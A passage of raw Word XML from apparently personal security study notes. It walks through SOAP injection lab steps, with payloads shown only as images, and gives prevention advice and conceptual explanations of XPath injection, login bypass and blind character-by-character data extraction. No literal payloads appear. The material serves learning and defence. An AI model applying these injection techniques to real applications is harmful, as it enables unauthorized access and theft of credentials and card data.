      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="009205C6">
        <w:t>FromAccount is also directly inserted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2560CFD4" w14:textId="58CE700B" w:rsidR="009205C6" w:rsidRDefault="009205C6" w:rsidP="00E33E3F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step5: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9D4D8C" w14:textId="225248F2" w:rsidR="009205C6" w:rsidRDefault="009205C6" w:rsidP="00E33E3F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="009205C6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49C53378" wp14:editId="70ED7F82">
            <wp:extent cx="5731510" cy="198120"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="74690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3193" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId108"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="198120"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0634A414" w14:textId="4168647C" w:rsidR="009205C6" w:rsidRDefault="009205C6" w:rsidP="00E33E3F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="009205C6">
        <w:t>ALL THREE parameters flow directly into SOAP XML.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396FDD2C" w14:textId="77777777" w:rsidR="00392E85" w:rsidRDefault="00392E85">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B15DC7" w14:textId="0306DD99" w:rsidR="009205C6" w:rsidRDefault="009205C6" w:rsidP="00E33E3F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Step6:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522C7575" w14:textId="4F85982B" w:rsidR="009205C6" w:rsidRDefault="009205C6" w:rsidP="00E33E3F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="009205C6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="532B8FBF" wp14:editId="02E62DFB">
            <wp:extent cx="5731510" cy="1492885"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="182284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43212" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId109"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1492885"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DFD626D" w14:textId="4F6706B6" w:rsidR="009205C6" w:rsidRPr="009205C6" w:rsidRDefault="009205C6" w:rsidP="009205C6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="009205C6">
        <w:t>We have definitively confirmed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2320E976" w14:textId="77777777" w:rsidR="009205C6" w:rsidRPr="009205C6" w:rsidRDefault="009205C6" w:rsidP="009205C6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="85"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009205C6">
        <w:t xml:space="preserve">User input is embedded into a SOAP message </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007FC353" w14:textId="77777777" w:rsidR="009205C6" w:rsidRPr="009205C6" w:rsidRDefault="009205C6" w:rsidP="009205C6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="85"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009205C6">
        <w:t>Input is not escaped or sanitized</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302C8566" w14:textId="2F8E487E" w:rsidR="009205C6" w:rsidRPr="009205C6" w:rsidRDefault="009205C6" w:rsidP="009205C6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="85"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009205C6">
        <w:t xml:space="preserve">XML structure can be influenced by the user </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB5CFE1" w14:textId="3E795EF7" w:rsidR="009205C6" w:rsidRPr="009205C6" w:rsidRDefault="009205C6" w:rsidP="009205C6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="85"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009205C6">
        <w:t>XML parser behavio</w:t>
      </w:r>
      <w:r>
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidRPr="009205C6">
        <w:t>r changes based on your input</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F649CDD" w14:textId="31658FD7" w:rsidR="009205C6" w:rsidRDefault="009205C6" w:rsidP="009205C6">
      <w:r w:rsidRPr="009205C6">
        <w:t>That’s SOAP injection detection complete.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627F2FF2" w14:textId="1FC92D55" w:rsidR="000C2644" w:rsidRDefault="000C2644" w:rsidP="009205C6">
      <w:r>
        <w:t xml:space="preserve">Step7: (Goal: </w:t>
      </w:r>
      <w:r w:rsidRPr="000C2644">
        <w:t>Open comment in Amount, close in ToAccount</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D38BF46" w14:textId="1F6AABD8" w:rsidR="000C2644" w:rsidRDefault="000C2644" w:rsidP="009205C6">
      <w:r w:rsidRPr="000C2644">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A4F5236" wp14:editId="68760780">
            <wp:extent cx="5731510" cy="202565"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="17824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1895" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId110"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="202565"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F22A8AB" w14:textId="1FA08B7C" w:rsidR="000C2644" w:rsidRPr="000C2644" w:rsidRDefault="000C2644" w:rsidP="000C2644">
      <w:r w:rsidRPr="000C2644">
        <w:t>We successfully commented across SOAP elements using user input.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59545001" w14:textId="6E209272" w:rsidR="000C2644" w:rsidRDefault="000C2644" w:rsidP="009205C6">
      <w:r>
        <w:t xml:space="preserve">Step8: (Goal: </w:t>
      </w:r>
      <w:r w:rsidRPr="000C2644">
        <w:t>Reverse the order</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D140793" w14:textId="70893486" w:rsidR="000C2644" w:rsidRDefault="000C2644" w:rsidP="009205C6">
      <w:r w:rsidRPr="000C2644">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5AB0F73B" wp14:editId="236B6DA9">
            <wp:extent cx="5731510" cy="485775"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="65301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8365" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId111"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="485775"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="685C96E6" w14:textId="48326470" w:rsidR="00B04341" w:rsidRPr="00B04341" w:rsidRDefault="00B04341" w:rsidP="009205C6">
      <w:r w:rsidRPr="00B04341">
        <w:t>This confirms raw XML assembly from user input.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11FE39CB" w14:textId="1521FC87" w:rsidR="000C2644" w:rsidRDefault="001F0723" w:rsidP="009205C6">
      <w:r>
        <w:t>To Prevent:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227039DF" w14:textId="73F4EE40" w:rsidR="001F0723" w:rsidRPr="001F0723" w:rsidRDefault="001F0723" w:rsidP="001F0723">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="87"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001F0723">
        <w:t>SOAP injection happens when user input is inserted into XML without protection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4668D596" w14:textId="48F9DAF2" w:rsidR="001F0723" w:rsidRPr="001F0723" w:rsidRDefault="001F0723" w:rsidP="001F0723">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="87"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001F0723">
        <w:t>Boundary validation must be applied wherever user data enters a SOAP message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED6B076" w14:textId="31B77957" w:rsidR="001F0723" w:rsidRPr="001F0723" w:rsidRDefault="001F0723" w:rsidP="001F0723">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="87"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001F0723">
        <w:t>Encoding XML metacharacters prevents user input from altering XML structure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3C77F5" w14:textId="4F80C970" w:rsidR="001F0723" w:rsidRPr="001F0723" w:rsidRDefault="001F0723" w:rsidP="001F0723">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="87"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001F0723">
        <w:t>HTML/XML encoding converts dangerous characters into harmless text.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D2CAB9" w14:textId="7ABB138E" w:rsidR="001F0723" w:rsidRPr="001F0723" w:rsidRDefault="001F0723" w:rsidP="001F0723">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="87"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001F0723">
        <w:t>Proper encoding makes SOAP injection impossible, not just harder.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B515B90" w14:textId="77777777" w:rsidR="001F0723" w:rsidRDefault="001F0723" w:rsidP="009205C6"/>
    <w:p w14:paraId="21069481" w14:textId="77777777" w:rsidR="00392B91" w:rsidRPr="0058682F" w:rsidRDefault="00392B91" w:rsidP="00392B91">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07DC667F" w14:textId="77777777" w:rsidR="00811E6D" w:rsidRDefault="00811E6D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="147BE3F2" w14:textId="672B6C08" w:rsidR="00392B91" w:rsidRPr="00A56427" w:rsidRDefault="00392B91" w:rsidP="00392B91">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00392B91">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Injecting into XPath</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469AB445" w14:textId="2831E46F" w:rsidR="005B129A" w:rsidRPr="005B129A" w:rsidRDefault="00811E6D" w:rsidP="005B129A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidR="005B129A" w:rsidRPr="005B129A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>hat is XML?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38028911" w14:textId="77777777" w:rsidR="005B129A" w:rsidRPr="005B129A" w:rsidRDefault="005B129A" w:rsidP="005B129A">
      <w:r w:rsidRPr="005B129A">
        <w:t>XML is just a way to store data in a structured, readable format — kind of like a text-based database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54512E63" w14:textId="77777777" w:rsidR="005B129A" w:rsidRPr="005B129A" w:rsidRDefault="005B129A" w:rsidP="005B129A">
      <w:r w:rsidRPr="005B129A">
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496D644E" w14:textId="77777777" w:rsidR="005B129A" w:rsidRPr="005B129A" w:rsidRDefault="005B129A" w:rsidP="005B129A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="89"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005B129A">
        <w:t>It stores things like names, emails, passwords, credit card numbers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04ADE419" w14:textId="77777777" w:rsidR="005B129A" w:rsidRPr="005B129A" w:rsidRDefault="005B129A" w:rsidP="005B129A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="89"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005B129A">
        <w:t>Data is wrapped in tags (like &lt;firstName&gt;, &lt;email&gt;)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E144BCE" w14:textId="77777777" w:rsidR="005B129A" w:rsidRDefault="005B129A" w:rsidP="005B129A">
      <w:r w:rsidRPr="005B129A">
        <w:t>Think of XML as a tree of information, where each piece of data is a node.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8AD18D" w14:textId="77777777" w:rsidR="0051092F" w:rsidRPr="0051092F" w:rsidRDefault="0051092F" w:rsidP="0051092F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0051092F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What is XPath?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E95DBEC" w14:textId="77777777" w:rsidR="0051092F" w:rsidRPr="0051092F" w:rsidRDefault="0051092F" w:rsidP="0051092F">
      <w:r w:rsidRPr="0051092F">
        <w:t>XPath (XML Path Language) is a language used to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0622D470" w14:textId="77777777" w:rsidR="0051092F" w:rsidRPr="0051092F" w:rsidRDefault="0051092F" w:rsidP="0051092F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="92"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0051092F">
        <w:t>Move around inside an XML document</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013C8F27" w14:textId="77777777" w:rsidR="0051092F" w:rsidRPr="0051092F" w:rsidRDefault="0051092F" w:rsidP="0051092F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="92"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0051092F">
        <w:t>Find specific pieces of data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4C8311" w14:textId="77777777" w:rsidR="0051092F" w:rsidRPr="0051092F" w:rsidRDefault="0051092F" w:rsidP="0051092F">
      <w:r w:rsidRPr="0051092F">
        <w:t>It’s similar to how SQL is used to query databases, but XPath is for XML.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114CE9FD" w14:textId="77777777" w:rsidR="0051092F" w:rsidRPr="0051092F" w:rsidRDefault="0051092F" w:rsidP="0051092F">
      <w:r w:rsidRPr="0051092F">
        <w:t>Simple analogy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB9407A" w14:textId="77777777" w:rsidR="0051092F" w:rsidRPr="0051092F" w:rsidRDefault="0051092F" w:rsidP="0051092F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="93"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0051092F">
        <w:t>XML = a file cabinet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33EB54F0" w14:textId="77777777" w:rsidR="0051092F" w:rsidRPr="0051092F" w:rsidRDefault="0051092F" w:rsidP="0051092F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="93"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0051092F">
        <w:t>XPath = directions to find a specific file inside it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FB2047" w14:textId="418A9990" w:rsidR="005B129A" w:rsidRDefault="00FE7B25" w:rsidP="005B129A">
      <w:r>
        <w:t>Basically,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79EDDBED" w14:textId="66D6ECC4" w:rsidR="00FE7B25" w:rsidRPr="00FE7B25" w:rsidRDefault="00FE7B25" w:rsidP="00FE7B25">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="95"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE7B25">
        <w:t>XPath is a language used to search and navigate XML data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351AFFD2" w14:textId="0A45BB09" w:rsidR="00FE7B25" w:rsidRPr="00FE7B25" w:rsidRDefault="00FE7B25" w:rsidP="00FE7B25">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="95"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE7B25">
        <w:t>Web applications often use XPath with user input</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D4E458" w14:textId="1D692B94" w:rsidR="00FE7B25" w:rsidRPr="00FE7B25" w:rsidRDefault="00FE7B25" w:rsidP="00FE7B25">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="95"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE7B25">
        <w:t>If user input is not validated, attackers can alter XPath queries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D48E1A0" w14:textId="7613680E" w:rsidR="00FE7B25" w:rsidRPr="00FE7B25" w:rsidRDefault="00FE7B25" w:rsidP="00FE7B25">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="95"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE7B25">
        <w:t>This attack is called XPath Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB8E2FA" w14:textId="04183FF6" w:rsidR="00FE7B25" w:rsidRDefault="00FE7B25" w:rsidP="005B129A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="95"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE7B25">
        <w:t>XPath Injection can expose sensitive data and break application security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08078E6E" w14:textId="6EDA57D5" w:rsidR="009D10F7" w:rsidRPr="005B129A" w:rsidRDefault="009D10F7" w:rsidP="005B129A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD75B9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Subverting Application Logic:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32BE1AC5" w14:textId="77777777" w:rsidR="00001296" w:rsidRPr="00001296" w:rsidRDefault="00001296" w:rsidP="00001296">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="95"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00001296">
        <w:t>The application checks username and password using XPath queries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4215B9F4" w14:textId="77777777" w:rsidR="00001296" w:rsidRPr="00001296" w:rsidRDefault="00001296" w:rsidP="00001296">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="95"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00001296">
        <w:t>Attackers can insert special input to change the query logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568B9CEE" w14:textId="77777777" w:rsidR="00001296" w:rsidRPr="00001296" w:rsidRDefault="00001296" w:rsidP="00001296">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="95"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00001296">
        <w:t>The injected condition can make authentication always true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451047C1" w14:textId="77777777" w:rsidR="00001296" w:rsidRPr="00001296" w:rsidRDefault="00001296" w:rsidP="00001296">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="95"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00001296">
        <w:t>This allows attackers to access sensitive data like credit card numbers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1474AF66" w14:textId="2529A39E" w:rsidR="005B129A" w:rsidRDefault="00001296" w:rsidP="00392B91">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="95"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00001296">
        <w:t>XPath Injection works similarly to SQL Injection but targets XML data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1376221F" w14:textId="554119A5" w:rsidR="00420570" w:rsidRPr="005B129A" w:rsidRDefault="00420570" w:rsidP="00420570">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00420570">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Informed XPath Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD75B9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02948DD5" w14:textId="4976A9C8" w:rsidR="00462E09" w:rsidRPr="00462E09" w:rsidRDefault="00462E09" w:rsidP="00462E09">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="98"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00462E09">
        <w:t>Informed XPath Injection uses application behavio</w:t>
      </w:r>
      <w:r w:rsidR="004730C8">
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidRPr="00462E09">
        <w:t>r to leak data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1811E26C" w14:textId="77777777" w:rsidR="00462E09" w:rsidRPr="00462E09" w:rsidRDefault="00462E09" w:rsidP="00462E09">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="98"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00462E09">
        <w:t>Attackers test conditions that return true or false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01280C01" w14:textId="77777777" w:rsidR="00462E09" w:rsidRPr="00462E09" w:rsidRDefault="00462E09" w:rsidP="00462E09">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="98"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00462E09">
        <w:t>XPath’s substring() function allows character-by-character guessing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78612068" w14:textId="77777777" w:rsidR="00462E09" w:rsidRPr="00462E09" w:rsidRDefault="00462E09" w:rsidP="00462E09">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="98"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00462E09">
        <w:t>Sensitive data like passwords can be extracted without seeing them directly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECF582B" w14:textId="355B1F6C" w:rsidR="00420570" w:rsidRDefault="00462E09" w:rsidP="00392B91">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="98"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00462E09">
        <w:t>This attack is similar to blind SQL injection but targets XML data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0558ED1B" w14:textId="77777777" w:rsidR="00F17628" w:rsidRDefault="00F17628" w:rsidP="005E6D9D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AAB41AB" w14:textId="77777777" w:rsidR="00F17628" w:rsidRDefault="00F17628" w:rsidP="005E6D9D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="097E309B" w14:textId="77777777" w:rsidR="00F17628" w:rsidRDefault="00F17628" w:rsidP="005E6D9D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44ECE161" w14:textId="3703025B" w:rsidR="005E6D9D" w:rsidRPr="005B129A" w:rsidRDefault="005E6D9D" w:rsidP="005E6D9D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Blind</w:t>
      </w:r>
